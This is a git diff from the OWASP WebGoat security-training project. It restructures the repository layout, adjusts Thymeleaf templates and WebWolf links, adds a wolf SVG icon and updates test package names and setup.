diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js b/src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js
rename to src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap/css/bootstrap.min.css b/src/main/resources/webgoat/static/plugins/bootstrap/css/bootstrap.min.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap/css/bootstrap.min.css
rename to src/main/resources/webgoat/static/plugins/bootstrap/css/bootstrap.min.css
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.eot b/src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.eot
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.eot
rename to src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.eot
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg b/src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg
rename to src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.ttf b/src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.ttf
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.ttf
rename to src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.ttf
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.woff b/src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.woff
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.woff
rename to src/main/resources/webgoat/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.woff
diff --git a/webgoat-container/src/main/resources/static/plugins/nanoScroller/jquery.nanoscroller.min.js b/src/main/resources/webgoat/static/plugins/nanoScroller/jquery.nanoscroller.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/nanoScroller/jquery.nanoscroller.min.js
rename to src/main/resources/webgoat/static/plugins/nanoScroller/jquery.nanoscroller.min.js
diff --git a/webgoat-container/src/main/resources/templates/about.html b/src/main/resources/webgoat/templates/about.html
similarity index 100%
rename from webgoat-container/src/main/resources/templates/about.html
rename to src/main/resources/webgoat/templates/about.html
diff --git a/webgoat-container/src/main/resources/templates/lesson_content.html b/src/main/resources/webgoat/templates/lesson_content.html
similarity index 65%
rename from webgoat-container/src/main/resources/templates/lesson_content.html
rename to src/main/resources/webgoat/templates/lesson_content.html
index 728ae97b2..cecb98d27 100644
--- a/webgoat-container/src/main/resources/templates/lesson_content.html
+++ b/src/main/resources/webgoat/templates/lesson_content.html
@@ -8,6 +8,6 @@
 <div id="message" class="info" th:utext="${message}"></div>
 <br/>
 
-<div th:replace="lesson:__${lesson.id}__"></div>
+<div th:replace="lesson:__'lessons/' + ${lesson.package} + '/html/' + ${lesson.id} + '.html'__"></div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-container/src/main/resources/templates/login.html b/src/main/resources/webgoat/templates/login.html
similarity index 100%
rename from webgoat-container/src/main/resources/templates/login.html
rename to src/main/resources/webgoat/templates/login.html
diff --git a/webgoat-container/src/main/resources/templates/main_new.html b/src/main/resources/webgoat/templates/main_new.html
similarity index 96%
rename from webgoat-container/src/main/resources/templates/main_new.html
rename to src/main/resources/webgoat/templates/main_new.html
index 11c8d8385..4546b7887 100644
--- a/webgoat-container/src/main/resources/templates/main_new.html
+++ b/src/main/resources/webgoat/templates/main_new.html
@@ -40,6 +40,12 @@
 
         </div><!--lesson title end-->
         <div class="user-nav pull-right" id="user-and-info-nav" style="margin-right: 75px;">
+            <a th:href="@{/WebWolf}" target="_blank">
+                <button type="button" id="webwolf-button" class="btn btn-default right_nav_button"
+                        title="WebWolf">
+                    <img th:src="@{/css/img/wolf.svg}"></img>
+                </button>
+            </a>
             <div class="dropdown" style="display:inline">
                 <button type="button" data-toggle="dropdown" class="btn btn-default dropdown-toggle" id="user-menu">
                     <i class="fa fa-user"></i> <span class="caret"></span>
diff --git a/webgoat-container/src/main/resources/templates/registration.html b/src/main/resources/webgoat/templates/registration.html
similarity index 100%
rename from webgoat-container/src/main/resources/templates/registration.html
rename to src/main/resources/webgoat/templates/registration.html
diff --git a/webgoat-container/src/main/resources/templates/scoreboard.html b/src/main/resources/webgoat/templates/scoreboard.html
similarity index 100%
rename from webgoat-container/src/main/resources/templates/scoreboard.html
rename to src/main/resources/webgoat/templates/scoreboard.html
diff --git a/webwolf/src/main/resources/static/css/img/favicon.ico b/src/main/resources/webwolf/static/css/img/webwolf.ico
similarity index 100%
rename from webwolf/src/main/resources/static/css/img/favicon.ico
rename to src/main/resources/webwolf/static/css/img/webwolf.ico
diff --git a/webwolf/src/main/resources/static/css/main.css b/src/main/resources/webwolf/static/css/webwolf.css
similarity index 100%
rename from webwolf/src/main/resources/static/css/main.css
rename to src/main/resources/webwolf/static/css/webwolf.css
diff --git a/webwolf/src/main/resources/static/images/wolf.png b/src/main/resources/webwolf/static/images/wolf.png
similarity index 100%
rename from webwolf/src/main/resources/static/images/wolf.png
rename to src/main/resources/webwolf/static/images/wolf.png
diff --git a/src/main/resources/webwolf/static/images/wolf.svg b/src/main/resources/webwolf/static/images/wolf.svg
new file mode 100644
index 000000000..bf9155f45
--- /dev/null
+++ b/src/main/resources/webwolf/static/images/wolf.svg
@@ -0,0 +1,80 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   id="svg1363"
+   sodipodi:version="0.32"
+   inkscape:version="0.46"
+   width="630"
+   height="705"
+   sodipodi:docbase="/home/odder/Desktop"
+   sodipodi:docname="Wolf_ogon_w_dole.svg"
+   version="1.0"
+   inkscape:output_extension="org.inkscape.output.svg.inkscape">
+  <metadata
+     id="metadata1368">
+    <rdf:RDF>
+      <cc:Work
+         rdf:about="">
+        <dc:format>image/svg+xml</dc:format>
+        <dc:type
+           rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
+        <cc:license
+           rdf:resource="http://web.resource.org/cc/PublicDomain" />
+        <dc:description>Illustration to &quot;Burial Mound&quot; poem by Yanka Kupala. Engraving by Arlen Kashkurevich.</dc:description>
+        <dc:title>Wolf</dc:title>
+        <dc:creator>
+          <cc:Agent>
+            <dc:title>Staffan Vilcans (trace)</dc:title>
+          </cc:Agent>
+        </dc:creator>
+      </cc:Work>
+      <cc:License
+         rdf:about="http://web.resource.org/cc/PublicDomain">
+        <cc:permits
+           rdf:resource="http://web.resource.org/cc/Reproduction" />
+        <cc:permits
+           rdf:resource="http://web.resource.org/cc/Distribution" />
+        <cc:permits
+           rdf:resource="http://web.resource.org/cc/DerivativeWorks" />
+      </cc:License>
+    </rdf:RDF>
+  </metadata>
+  <defs
+     id="defs1366">
+    <inkscape:perspective
+       sodipodi:type="inkscape:persp3d"
+       inkscape:vp_x="0 : 352.5 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_z="600 : 352.5 : 1"
+       inkscape:persp3d-origin="300 : 235 : 1"
+       id="perspective7" />
+  </defs>
+  <sodipodi:namedview
+     inkscape:window-height="753"
+     inkscape:window-width="1280"
+     inkscape:pageshadow="2"
+     inkscape:pageopacity="0.0"
+     borderopacity="1.0"
+     bordercolor="#666666"
+     pagecolor="#ffffff"
+     id="base"
+     inkscape:zoom="0.5"
+     inkscape:cx="210.80764"
+     inkscape:cy="195.98901"
+     inkscape:window-x="0"
+     inkscape:window-y="20"
+     inkscape:current-layer="svg1363"
+     showgrid="false" />
+  <path
+     style="fill:#000000"
+     d="M 96.27658,330.50067 C 107.80468,323.95418 116.78796,330.21069 134.6166,320.02294 C 145.36753,313.87958 163.84726,311.43783 220.60769,291.33091 C 239.89997,285.96445 257.97778,274.78875 278.08478,272.65904 C 293.84196,270.89459 308.98871,265.77953 324.43255,262.34571 C 333.99262,260.35238 356.56274,251.43238 363.70224,246.82584 C 383.19961,241.03491 399.50187,231.96487 417.5957,223.70591 C 427.36363,221.02987 485.58471,166.44821 482.21295,163.12794 C 481.11927,162.05096 474.89301,163.47368 467.1616,166.56726 C 452.82114,172.30533 449.32867,172.88855 447.42941,169.86241 C 446.06584,167.68982 456.20844,146.53435 459.14291,145.43037 C 462.78233,140.69832 465.5866,134.52722 469.03972,129.28212 C 480.39275,111.53028 487.8734,91.728942 496.0314,72.398106 C 500.70148,59.837963 516.22248,57.017858 522.70437,46.045476 C 523.42988,43.794516 528.95236,36.678286 534.97657,30.231649 C 541.00076,23.785017 545.25664,14.866886 549.32295,10.413601 C 556.2901,2.7834462 557.12432,2.4341762 563.79596,4.3542332 L 570.87565,6.3917502 C 571.63343,11.955845 569.80529,30.840798 577.43518,31.88853 C 579.59101,31.88853 582.48353,30.777123 583.86297,29.418738 C 588.82114,24.536287 590.42459,30.393132 588.20317,45.272046 C 587.02056,53.192966 585.10183,62.741836 583.93927,66.491806 C 582.07408,72.508176 582.44413,88.306546 585.3704,127.59297 C 587.41176,154.99918 589.32889,168.09024 592.90559,179.04698 C 595.12274,185.83891 597.85136,194.24021 598.96919,197.71655 C 601.68366,206.15828 601.56106,224.77219 598.77984,226.46481 C 594.37149,227.90623 591.97426,221.64441 587.88015,222.64882 C 587.33236,223.57155 587.7569,232.66206 588.82358,242.84995 C 593.78917,290.27636 593.53901,301.50752 587.51715,301.50752 C 581.93824,301.50752 581.72698,310.44111 586.60545,340.05923 C 587.88667,360.91258 579.73523,345.76822 573.26045,346.52523 C 571.50743,348.25148 570.90582,356.42228 571.28948,373.29407 L 571.8417,397.57822 C 565.0233,405.90248 558.60425,414.5777 551.39017,422.57145 C 546.93407,427.61574 548.0927,435.17606 547.73461,441.46242 C 547.38452,447.68835 545.6322,460.19168 543.84054,469.24758 C 539.21004,492.6524 536.52962,506.53193 533.90367,520.70158 C 532.64498,527.49352 528.76509,544.6277 525.28168,558.77755 L 518.94824,584.50455 L 522.46673,606.05518 C 524.40189,617.90802 526.36111,627.97595 526.82052,628.42837 C 535.51737,630.97076 544.4671,632.07782 552.40633,636.79934 C 562.31579,642.48351 573.48296,644.2836 582.6106,651.46931 C 590.76959,658.37893 600.76943,662.2717 609.7766,667.98331 C 617.4652,673.00246 637.53036,705 628.1365,705 L 37.039214,705 C 21.876318,705 34.49501,672.87319 36.344767,664.30455 C 37.511013,658.90215 39.551898,639.20016 40.880068,620.52235 C 42.208238,601.84456 44.195002,584.70339 45.295094,582.43088 C 46.395186,580.15838 50.550249,576.10276 54.528563,573.4184 C 62.663429,567.92942 56.650459,560.35978 64.354854,555.57449 C 74.24599,549.43098 88.411686,541.7133 89.495438,541.61731 C 90.57919,541.52132 92.886256,517.20729 93.547616,516.15352 C 94.20898,515.09975 95.6047,507.67474 95.63635,506.4485 C 95.66799,505.22226 96.7829,495.44694 97.61072,490.78586 C 97.74068,485.078 93.466361,480.78317 93.466361,479.691 C 92.336289,472.62965 86.715113,471.76045 87.293168,464.45854 C 89.941308,455.3044 80.31952,426.11071 77.185763,421.22331 C 78.318224,415.90221 112.29108,468.59232 92.992181,504.99323 C 88.029449,514.35376 89.755486,517.55236 84.54466,526.81099 C 62.477572,566.01994 23.473777,617.89913 16.820243,566.50231 C 15.350054,555.14549 22.327419,521.21877 23.002307,498.43957 C 23.79835,471.57105 14.937172,428.69969 38.571298,389.49941 C 65.98494,344.03031 71.190365,343.10018 96.27658,330.50067 z M 97.52624,688.29068 C 112.58459,680.11565 113.56667,679.88435 137.00461,678.99278 C 159.15862,678.15004 191.39705,671.97328 204.93211,665.9781 C 215.86894,661.13381 227.45906,657.56924 232.27347,657.56924 C 237.38349,657.56924 237.53107,657.91963 236.17401,666.83097 C 234.89258,675.24561 235.15516,676.09268 239.045,676.09268 C 241.39976,676.09268 245.9741,675.08894 249.21017,673.86213 C 252.44625,672.63533 260.56353,670.75299 267.24858,669.67919 C 279.8909,667.64847 287.49013,664.25791 287.49013,660.64804 C 287.49013,659.49 281.34608,649.29336 273.83669,637.98881 C 259.69634,616.70213 240.55228,597.03085 225.51756,588.33901 C 216.33231,583.02885 213.96458,578.09725 215.77146,568.03927 C 216.38151,564.64331 217.31972,557.69702 217.85637,552.60307 C 218.89511,542.74273 219.44642,543.81857 201.07841,519.86054 C 193.23742,509.63325 187.16646,506.36564 187.16646,512.3726 C 179.1408,525.30971 163.94315,532.09117 155.38472,544.65483 C 132.68594,571.46398 114.93675,583.42439 95.6689,599.94076 C 81.273074,609.14112 69.790181,623.5191 66.289608,640.17248 C 64.816878,648.04272 63.042438,656.79743 62.346428,659.6274 C 60.651778,666.51771 61.185888,668.75769 68.108018,683.79099 C 72.398618,693.10921 75.153078,696.67429 78.061948,696.67429 C 80.273928,696.67429 89.032858,692.90166 97.52624,688.29068 z M 379.15944,653.53597 C 389.32406,650.62759 396.51157,642.08809 406.57788,639.03656 C 413.86336,637.60161 414.6975,626.44122 408.56797,612.4103 C 403.8966,601.71725 404.04065,587.99211 408.88455,582.24469 C 410.02676,580.88944 414.84332,567.87709 419.58802,553.32832 C 427.41415,529.33092 428.29959,524.4265 429.12895,500.48082 C 430.1705,470.40902 428.70135,456.75434 424.243,455.06965 C 422.54807,454.42918 416.42953,454.98072 410.64621,456.29529 C 398.64195,459.02387 396.34554,458.11758 374.2283,441.92262 C 355.78168,428.41541 342.03745,423.08389 322.175,421.73065 C 309.11595,420.84092 303.58679,419.46361 297.94051,415.69382 C 292.58185,412.11606 286.35089,410.43433 274.64444,409.40628 C 260.15877,408.13415 258.46087,408.37592 256.49647,411.99041 C 253.64782,417.23186 254.66723,423.96085 260.02589,435.28793 C 262.43578,440.38188 264.42814,447.23881 264.45339,450.52555 C 264.50084,456.70219 273.25959,477.08882 278.30124,482.75738 C 282.9801,493.58117 276.27575,509.58677 272.91206,520.54502 C 271.08027,527.75913 271.32177,534.51778 268.53809,541.54857 C 261.472,557.89553 263.29039,566.23838 276.10628,576.27191 C 285.41596,581.99199 290.69789,589.55074 295.98207,598.91167 C 299.68508,605.70361 304.98301,615.42841 307.75524,620.52235 C 310.63099,626.57124 313.02491,629.87088 319.3638,630.57807 C 320.80072,630.73178 326.00347,634.6498 330.92546,639.28479 C 338.74242,646.64599 340.73765,647.55263 346.69746,646.45163 C 352.00294,645.47152 355.10003,646.33878 360.62279,650.35113 C 368.6106,656.15436 369.40485,656.29081 379.15944,653.53597 z M 484.47911,631.1226 C 487.48785,628.1598 482.66851,613.54326 476.1787,605.94834 C 470.60211,599.42214 470.23516,592.50392 474.71377,578.33008 C 481.71256,556.18032 487.56506,531.79492 492.46306,504.37476 C 494.40359,495.9223 492.04656,484.67344 483.25938,481.13959 C 481.97965,481.55964 479.57191,486.46517 477.90881,492.04074 C 475.05194,501.61857 463.31146,535.90676 454.353,560.83571 C 452.11565,567.06165 448.38194,579.9573 446.0559,589.49269 C 441.85795,606.70169 441.92874,611.84295 446.60675,629.49861 C 448.63036,637.13612 448.97151,637.3847 455.36196,635.87852 C 464.51297,632.65611 475.94776,636.17528 484.47911,631.1226 z"
+     id="path1372"
+     sodipodi:nodetypes="cscccccsssccccsscccssssssccssccccccsscccccccsssssssccsccccsssssccsssssssssssssccccssscccssssssssssssscccccccsssccssccsssscc" />
+</svg>
diff --git a/webwolf/src/main/resources/static/js/fileUpload.js b/src/main/resources/webwolf/static/js/fileUpload.js
similarity index 64%
rename from webwolf/src/main/resources/static/js/fileUpload.js
rename to src/main/resources/webwolf/static/js/fileUpload.js
index b913bce8c..6883dbf4b 100644
--- a/webwolf/src/main/resources/static/js/fileUpload.js
+++ b/src/main/resources/webwolf/static/js/fileUpload.js
@@ -7,9 +7,5 @@ $(document).ready(function() {
 });
 
 $(document).on('click','.fa-files-o',function(){
-    var link = $('#fileLink').attr("href");
-    console.log("testing" + document.protocol + "//" + (document.hostname || document.pathname + link));
-
-
     document.execCommand('copy');
-});
\ No newline at end of file
+});
diff --git a/webwolf/src/main/resources/static/js/jwt.js b/src/main/resources/webwolf/static/js/jwt.js
similarity index 100%
rename from webwolf/src/main/resources/static/js/jwt.js
rename to src/main/resources/webwolf/static/js/jwt.js
diff --git a/webwolf/src/main/resources/static/js/mail.js b/src/main/resources/webwolf/static/js/mail.js
similarity index 100%
rename from webwolf/src/main/resources/static/js/mail.js
rename to src/main/resources/webwolf/static/js/mail.js
diff --git a/webwolf/src/main/resources/templates/error.html b/src/main/resources/webwolf/templates/error.html
similarity index 100%
rename from webwolf/src/main/resources/templates/error.html
rename to src/main/resources/webwolf/templates/error.html
diff --git a/webwolf/src/main/resources/templates/files.html b/src/main/resources/webwolf/templates/files.html
similarity index 93%
rename from webwolf/src/main/resources/templates/files.html
rename to src/main/resources/webwolf/templates/files.html
index b3bcde29c..5ba247373 100644
--- a/webwolf/src/main/resources/templates/files.html
+++ b/src/main/resources/webwolf/templates/files.html
@@ -20,7 +20,7 @@
         </p>
         <p>
             Each file will be available under the following url:
-            <span th:text="${webwolf_url}">http://localhost:9090/</span>/files/{username}/{filename}.
+            <span th:text="${webwolf_url}">http://localhost:9090/WebWolf/</span>/files/{username}/{filename}.
         </p>
         <p>
             You can copy and paste the location from the table below.
@@ -34,7 +34,7 @@
         <div class="panel-body">
 
             <!-- Standard Form -->
-            <form th:action="@{/WebWolf/fileupload}" method="post" enctype="multipart/form-data">
+            <form th:action="@{/fileupload}" method="post" enctype="multipart/form-data">
                 <div class="form-inline">
                     <div class="form-group">
                         <input type="file" name="file"/>
@@ -69,4 +69,4 @@
 
 </div>
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/webwolf/src/main/resources/templates/fragments/footer.html b/src/main/resources/webwolf/templates/fragments/footer.html
similarity index 100%
rename from webwolf/src/main/resources/templates/fragments/footer.html
rename to src/main/resources/webwolf/templates/fragments/footer.html
diff --git a/webwolf/src/main/resources/templates/fragments/header.html b/src/main/resources/webwolf/templates/fragments/header.html
similarity index 61%
rename from webwolf/src/main/resources/templates/fragments/header.html
rename to src/main/resources/webwolf/templates/fragments/header.html
index 79f11fe0a..dbf525a7d 100644
--- a/webwolf/src/main/resources/templates/fragments/header.html
+++ b/src/main/resources/webwolf/templates/fragments/header.html
@@ -2,10 +2,11 @@
 <head>
     <title>WebWolf</title>
     <div th:fragment="header-css">
-        <link rel="stylesheet" type="text/css" href="/webjars/bootstrap/3.3.7/css/bootstrap.min.css"/>
-        <link rel="stylesheet" th:href="@{/css/main.css}"/>
-        <script src="/webjars/jquery/3.5.1/jquery.min.js"></script>
-        <script src="/webjars/bootstrap/3.3.7/js/bootstrap.min.js"></script>
+        <link rel="icon" th:href="@{/css/img/webwolf.ico}"/>
+        <link rel="stylesheet" type="text/css" th:href="@{/webjars/bootstrap/3.3.7/css/bootstrap.min.css}"/>
+        <link rel="stylesheet" th:href="@{/css/webwolf.css}"/>
+        <script th:src="@{/webjars/jquery/3.5.1/jquery.min.js}"></script>
+        <script th:src="@{/webjars/bootstrap/3.3.7/js/bootstrap.min.js}"></script>
     </div>
 </head>
 <body>
@@ -13,23 +14,23 @@
     <nav class="navbar navbar-inverse">
         <div class="container-fluid">
             <div class="navbar-header">
-                <a class="navbar-brand" th:href="@{/WebWolf/home}">WebWolf</a>
+                <a class="navbar-brand" th:href="@{/home}">WebWolf</a>
             </div>
 
             <ul class="nav navbar-nav">
-                <li class="active"><a th:href="@{/WebWolf/home}">Home</a></li>
+                <li class="active"><a th:href="@{/home}">Home</a></li>
             </ul>
             <ul class="nav navbar-nav">
-                <li><a th:href="@{/WebWolf/files}">Files</a></li>
+                <li><a th:href="@{/files}">Files</a></li>
             </ul>
             <ul class="nav navbar-nav">
-                <li><a th:href="@{/WebWolf/mail}">Mailbox</a></li>
+                <li><a th:href="@{/mail}">Mailbox</a></li>
             </ul>
             <ul class="nav navbar-nav">
-                <li><a th:href="@{/WebWolf/requests}">Incoming requests</a></li>
+                <li><a th:href="@{/requests}">Incoming requests</a></li>
             </ul>
             <ul class="nav navbar-nav">
-                <li><a th:href="@{/WebWolf/jwt}">JWT</a></li>
+                <li><a th:href="@{/jwt}">JWT</a></li>
             </ul>
             <ul class="nav navbar-nav navbar-right">
 
@@ -49,4 +50,4 @@
 </div>
 
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/webwolf/src/main/resources/templates/home.html b/src/main/resources/webwolf/templates/home.html
similarity index 95%
rename from webwolf/src/main/resources/templates/home.html
rename to src/main/resources/webwolf/templates/home.html
index 886e9a8d1..c462cc2d3 100644
--- a/webwolf/src/main/resources/templates/home.html
+++ b/src/main/resources/webwolf/templates/home.html
@@ -1,7 +1,6 @@
 <!DOCTYPE HTML>
 <html xmlns:th="http://www.thymeleaf.org">
 <head>
-    <link rel="icon" href="/css/img/favicon.ico"/>
     <div th:replace="fragments/header :: header-css"/>
 </head>
 <body>
@@ -35,4 +34,4 @@
 <div th:replace="fragments/footer :: footer"/>
 
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/webwolf/src/main/resources/templates/jwt.html b/src/main/resources/webwolf/templates/jwt.html
similarity index 100%
rename from webwolf/src/main/resources/templates/jwt.html
rename to src/main/resources/webwolf/templates/jwt.html
diff --git a/webwolf/src/main/resources/templates/mailbox.html b/src/main/resources/webwolf/templates/mailbox.html
similarity index 100%
rename from webwolf/src/main/resources/templates/mailbox.html
rename to src/main/resources/webwolf/templates/mailbox.html
diff --git a/webwolf/src/main/resources/templates/registration.html b/src/main/resources/webwolf/templates/registration.html
similarity index 100%
rename from webwolf/src/main/resources/templates/registration.html
rename to src/main/resources/webwolf/templates/registration.html
diff --git a/webwolf/src/main/resources/templates/requests.html b/src/main/resources/webwolf/templates/requests.html
similarity index 100%
rename from webwolf/src/main/resources/templates/requests.html
rename to src/main/resources/webwolf/templates/requests.html
diff --git a/webwolf/src/main/resources/templates/login.html b/src/main/resources/webwolf/templates/webwolf-login.html
similarity index 100%
rename from webwolf/src/main/resources/templates/login.html
rename to src/main/resources/webwolf/templates/webwolf-login.html
diff --git a/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java b/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
new file mode 100644
index 000000000..0fd8e65c1
--- /dev/null
+++ b/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
@@ -0,0 +1,10 @@
+package org.owasp.webgoat.container;
+
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.context.annotation.PropertySource;
+
+@SpringBootApplication(scanBasePackages = "org.owasp.webgoat.container")
+@PropertySource("classpath:application-webgoat.properties")
+public class WebGoatApplication {
+
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java b/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
similarity index 77%
rename from webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
rename to src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
index dacfe34cc..dd1fe4aa8 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
@@ -23,16 +23,18 @@
  * <p>
  */
 
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
 import org.mockito.Mock;
-import org.owasp.webgoat.i18n.Language;
-import org.owasp.webgoat.i18n.Messages;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.UserSessionData;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.i18n.Language;
+import org.owasp.webgoat.container.i18n.Messages;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.session.UserSessionData;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
+import org.springframework.context.support.ClassPathXmlApplicationContext;
+import org.springframework.core.io.support.ResourcePatternResolver;
 import org.springframework.test.util.ReflectionTestUtils;
 import org.springframework.web.servlet.i18n.FixedLocaleResolver;
 
@@ -49,6 +51,7 @@ public class AssignmentEndpointTest {
     protected WebSession webSession;
     @Mock
     protected UserSessionData userSessionData;
+
     private Language language = new Language(new FixedLocaleResolver()) {
         @Override
         public Locale getLocale() {
@@ -56,7 +59,7 @@ public class AssignmentEndpointTest {
         }
     };
     protected Messages messages = new Messages(language);
-    protected PluginMessages pluginMessages = new PluginMessages(messages, language);
+    protected PluginMessages pluginMessages = new PluginMessages(messages, language, new ClassPathXmlApplicationContext());
 
     public void init(AssignmentEndpoint a) {
         messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
@@ -65,4 +68,4 @@ public class AssignmentEndpointTest {
         ReflectionTestUtils.setField(a, "messages", pluginMessages);
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/plugins/LessonTest.java b/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
similarity index 59%
rename from webgoat-container/src/test/java/org/owasp/webgoat/plugins/LessonTest.java
rename to src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
index ba578ba46..89b2a3cb5 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/plugins/LessonTest.java
+++ b/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
@@ -1,12 +1,15 @@
-package org.owasp.webgoat.plugins;
+package org.owasp.webgoat.container.plugins;
 
 import org.flywaydb.core.Flyway;
-import org.flywaydb.core.api.configuration.FluentConfiguration;
 import org.junit.jupiter.api.BeforeEach;
-import org.owasp.webgoat.i18n.Language;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.WebGoat;
+import org.owasp.webgoat.container.i18n.Language;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.Initializeable;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.boot.test.context.SpringBootTest;
 import org.springframework.boot.test.mock.mockito.MockBean;
 import org.springframework.boot.web.server.LocalServerPort;
@@ -15,6 +18,7 @@ import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.web.context.WebApplicationContext;
 
 import javax.annotation.PostConstruct;
+import java.util.List;
 import java.util.Locale;
 import java.util.function.Function;
 
@@ -24,8 +28,8 @@ import static org.mockito.Mockito.when;
  * @author nbaars
  * @since 5/20/17.
  */
-@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
-@TestPropertySource(locations = {"classpath:/application-webgoat.properties", "classpath:/application-test.properties"})
+@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = WebGoat.class)
+@TestPropertySource(locations = {"classpath:/application-webgoat.properties", "classpath:/application-webgoat-test.properties"})
 public abstract class LessonTest {
 
     @LocalServerPort
@@ -37,23 +41,26 @@ public abstract class LessonTest {
     protected PluginMessages messages;
     @Autowired
     private Function<String, Flyway> flywayLessons;
+    @Autowired
+    private List<Initializeable> lessonInitializers;
     @MockBean
     protected WebSession webSession;
-
     @MockBean
     private Language language;
+    @Value("${webgoat.user.directory}")
+    protected String webGoatHomeDirectory;
 
     @BeforeEach
     void init() {
-        when(webSession.getUserName()).thenReturn("unit-test");
+        var user = new WebGoatUser("unit-test", "test");
+        when(webSession.getUserName()).thenReturn(user.getUsername());
+        when(webSession.getUser()).thenReturn(user);
         when(language.getLocale()).thenReturn(Locale.getDefault());
+        lessonInitializers.forEach(init -> init.initialize(webSession.getUser()));
     }
 
     @PostConstruct
     public void createFlywayLessonTables() {
         flywayLessons.apply("PUBLIC").migrate();
     }
-
-
-
 }
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/service/HintServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
similarity index 86%
rename from webgoat-container/src/test/java/org/owasp/webgoat/service/HintServiceTest.java
rename to src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
index 541344676..d4b083f96 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/HintServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import com.beust.jcommander.internal.Lists;
 import org.hamcrest.CoreMatchers;
